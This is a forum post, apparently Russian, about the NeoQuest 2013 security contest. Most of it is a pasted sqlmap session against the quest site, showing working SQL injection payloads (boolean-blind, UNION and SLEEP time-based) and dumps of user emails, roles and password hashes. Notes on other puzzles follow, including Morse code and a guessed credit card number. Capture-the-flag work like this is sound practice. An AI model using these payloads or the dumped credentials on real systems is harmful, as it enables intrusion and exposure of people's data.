NEOQUEST 2013neoquest.ru

И так что имеем имеем дамп БД к 1 задани

root@cloudbackup:~/sqlmap# python sqlmap.py -u "http://rosquest.ru/index.php?url=6"

sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 07:21:29

[07:21:29] [INFO] testing connection to the target url

[07:21:29] [INFO] heuristics detected web page charset 'ascii'

[07:21:29] [INFO] testing if the url is stable, wait a few seconds

[07:21:30] [WARNING] url is not stable, sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on

how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C

[07:21:38] [INFO] testing if GET parameter 'url' is dynamic

[07:21:38] [WARNING] GET parameter 'url' does not appear dynamic

[07:21:38] [WARNING] reflective value(s) found and filtering out

[07:21:38] [INFO] heuristic (parsing) test shows that GET parameter 'url' might be injectable (possible DBMS: 'MySQL')

[07:21:38] [INFO] testing for SQL injection on GET parameter 'url'

heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y

do you want to include all tests for 'MySQL' ignoring provided level (1) and risk (1)? [Y/n] Y

[07:21:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[07:21:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'

[07:21:53] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'

[07:21:54] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'

[07:21:54] [INFO] GET parameter 'url' is 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)' injectable

[07:21:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

[07:21:55] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'

[07:21:55] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'

[07:21:55] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'

[07:21:55] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'

[07:21:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'

[07:21:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'

[07:21:55] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'

[07:21:56] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'

[07:21:57] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'

[07:21:57] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'

[07:21:57] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'

[07:21:57] [INFO] testing 'MySQL inline queries'

[07:21:57] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[07:21:57] [INFO] testing 'MySQL 5.0.11 AND time-based blind'

[07:22:07] [INFO] GET parameter 'url' is 'MySQL > 5.0.11 AND time-based blind' injectable

[07:22:07] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'

[07:22:07] [INFO] automatically exten

07.02.13

[INFO] target url appears to have 2 columns in query

[07:22:08] [INFO] GET parameter 'url' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable

GET parameter 'url' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y

sqlmap identified the following injection points with a total of 74 HTTP(s) requests:

---

Place: GET

Parameter: url

Type: boolean-based blind

Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)

Payload: url=6 RLIKE IF(4438=4438,6,0x28)

Type: UNION query

Title: MySQL UNION query (NULL) - 2 columns

Payload: url=-6866 UNION ALL SELECT NULL,CONCAT(0x3a6266613a,0x43456773575656536753,0x 3a6d73703a)#

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: url=6 AND SLEEP(5)

---

[07:22:15] [INFO] the back-end DBMS is MySQL

web application technology: Nginx, PHP 5.3.10

back-end DBMS: MySQL 5.0.11

[07:22:15] [INFO] fetched data logged to text files under 'output/rosquest.ru'
[*] shutting down at 07:22:15

[07:25:03] [INFO] testing MySQL

[07:25:03] [WARNING] reflective value(s) found and filtering out

[07:25:03] [INFO] confirming MySQL

[07:25:03] [INFO] the back-end DBMS is MySQL

[07:25:03] [INFO] fetching banner

[07:25:03] [INFO] actively fingerprinting MySQL

[07:25:04] [INFO] executing MySQL comment injection fingerprint

web application technology: Nginx, PHP 5.3.10

back-end DBMS: active fingerprint: MySQL >= 5.1.12 and 5.0.11 AND time-based blind

Payload: url=6 AND SLEEP(5)

---

[07:28:14] [INFO] the back-end DBMS is MySQL

web application technology: Nginx, PHP 5.3.10

back-end DBMS: MySQL 5

[07:28:14] [INFO] fetching columns for table 'users' in database 'neoquest_web'

[07:28:15] [WARNING] reflective value(s) found and filtering out

[07:28:15] [INFO] the SQL query used returns 3 entries

[07:28:15] [INFO] retrieved: "id","int(11)"

[07:28:15] [INFO] retrieved: "email","varchar(40)"

[07:28:16] [INFO] retrieved: "role","varchar(50)"

[07:28:16] [INFO] fetching entries for table 'users' in database 'neoquest_web'

[07:28:16] [INFO] the SQL query used returns 10 entries

[07:28:16] [INFO] retrieved: "SemenPetrov@mail.ru","1","Manager"

[07:28:16] [INFO] retrieved: "PetrScheglov.2012@mail.ru","2","Admin"

[07:28:16] [INFO] retrieved: "HayoumaAzam@gmail.com","3","Admin"

[07:28:16] [INFO] retrieved: "OlgaIvanova@gmail.com","4","Accountant"

[07:28:17] [INFO] retrieved: "CourtneyKazembe.2012@gmail.com","5","Admin"

[07:28:17] [INFO] retrieved: "FlugenKohlmeier@hotmail.com","6","Admin"

[07:28:17] [INFO] retrieved: "KenShvartz@hotmail.com","7","User"

[07:28:17] [INFO] retrieved: "AnnaJokivirta@hotmail.com","8","Admin"

[07:28:17] [INFO] retrieved: "AlbertoIperti@hotmail.com","9","Admin"

[07:28:17] [INFO] retrieved: "KrisLezetc.2012@hotmail.com","10","Admin"

[07:28:17] [INFO] analyzing table dump for possible password hashes

Database: neoquest_web

Table: users

[10 entries]

+----+------------+--------------------------------+

| id | role | email |

+----+------------+--------------------------------+

| 1 | Manager | SemenPetrov@mail.ru |

| 2 | Admin | PetrScheglov.2012@mail.ru |

| 3 | Admin | HayoumaAzam@gmail.com |

| 4 | Accountant | OlgaIvanova@gmail.com |

| 5 | Admin | CourtneyKazembe.2012@gmail.com |

| 6 | Admin | FlugenKohlmeier@hotmail.com |

| 7 | User | KenShvartz@hotmail.com |

| 8 | Admin | AnnaJokivirta@hotmail.com |

| 9 | Admin | AlbertoIperti@hotmail.com |

| 10 | Admin | KrisLezetc.2012@hotmail.com |

+----+------------+--------------------------------+

[07:28:17] [INFO] table 'neoquest_web.users' dumped to CSV file 'output/rosquest.ru/dump/neoquest_web/users.csv'

[07:28:17] [INFO] fetched data logged to text files under 'output/rosquest.ru'

Я сделал это )))

Имеем почты всех кто есть в БД и их хеширвоаные пароли

[08:13:02] [INFO] fetching entries for table '94fhdi54g8rinnf5548581fjhgdt' in database 'neoquest_web'

[08:13:02] [INFO] the SQL query used returns 7 entries

[08:13:02] [INFO] retrieved: "CourtneyKazembe.2012@gmail.com","4f507829e3f2a72b 4df9de064df76e69","1"

[08:13:02] [INFO] retrieved: "HayoumaAzam@gmail.com","ecb67dd66dd44f787c15d7d23 1402783","2"

[08:13:02] [INFO] retrieved: "PetrScheglov.2012@mail.ru","aefebf534eb346df845be b0d72a1fdde","3"

[08:13:02] [INFO] retrieved: "FlugenKohlmeier@hotmail.com","9de638c88a6e61d44fd 29b6f48ef879b","4"

[08:13:02] [INFO] retrieved: "AnnaJokivirta@hotmail.com","50caceceaf185a26cad1a c0bb51fe6ad","5"

[08:13:03] [INFO] retrieved: "AlbertoIperti@hotmail.com","0e4a8027f7d9d9b03e013 60cc43c26a9","6"

[08:13:03] [INFO] retrieved: "KrisLezetc.2012@hotmail.com","bb9030adff799137c67 0ca3080399542","7"

[08:13:03] [INFO] analyzing table dump for possible password hashes

[08:13:03] [INFO] recognized possible password hashes in column 'adm_pass'

Вот что имеем по поводу задания МР3 плеером

в начале при ускорении записи и обратном реверсе идет слово РАМ потом по средине азбука морзе в рассшифровке ГЕНАЕ потом в конце если разделить запись на каналы в правом канале слышна морзе ИНИ из этой несурядици должно выйти одно какоето осмысленное слово ответом которго будет хеш сумма МД5

и задание с сноубордистами

с пХЕШЕМ ну нарисовал правеьную картинку 8 на 8 сделал ее серой ка ктот ПХЕШ узнать? и что на скип пассе за циферки через # каким они боком?

Подключайтесь думаем вместе)

Добавлено спустя 9 минут 23 секунды:

Предположительно номер кредитки будет 4701-5959-2764-8440

Но сначала надо авторизироватся на сайте авиакомпании

Добавлено спустя 1 минуту 24 секунды:

РАМ потом идет азбука морзе [--.] [.] [-.] [..] [.] и вторая в правом канале звука [..] [-.] [..]